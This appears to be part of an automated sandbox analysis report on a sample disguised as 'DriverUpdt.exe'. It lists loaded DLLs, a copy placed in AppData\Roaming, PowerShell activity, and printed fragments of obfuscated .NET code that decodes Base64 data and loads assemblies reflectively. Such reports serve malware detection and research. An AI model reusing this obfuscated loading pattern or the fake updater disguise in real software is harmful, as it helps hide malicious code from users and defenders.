                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: windowscodecs.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: thumbcache.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: directmanipulation.dll
                      Source: C:\Windows\System32\OpenWith.exe | Section loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: DriverUpdt.lnk.0.dr | LNK file: ..\..\..\..\..\DriverUpdt
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: DriverUpdt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DriverUpdt.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | .Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F20DA0 pushad ; retf 2_2_00007FF848F20E0D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F200BD pushad ; iretd 2_2_00007FF848F200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848DED2A5 pushad ; iretd 5_2_00007FF848DED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848F000BD pushad ; iretd 5_2_00007FF848F000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848E0D2A5 pushad ; iretd 8_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848F2B9FA push E85A2FD7h; ret 8_2_00007FF848F2BAF9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848F200BD pushad ; iretd 8_2_00007FF848F200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848E0D2A5 pushad ; iretd 10_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848F200BD pushad ; iretd 10_2_00007FF848F200C1
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 16_2_00007FF848F100BD pushad ; iretd 16_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 20_2_00007FF848F100BD pushad ; iretd 20_2_00007FF848F100C1
                      Source: DriverUpdt.exe, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.cs | High entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: DriverUpdt.exe, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.cs | High entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: DriverUpdt.exe, ItGbRSbZFa55CcXB.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
                      Source: DriverUpdt.exe, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.cs | High entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
                      Source: DriverUpdt.exe, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.cs | High entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: DriverUpdt.exe, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.cs | High entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | High entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs | High entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | High entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: DriverUpdt.exe, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.cs | High entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: DriverUpdt.0.dr, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.cs | High entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: DriverUpdt.0.dr, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.cs | High entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: DriverUpdt.0.dr, ItGbRSbZFa55CcXB.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
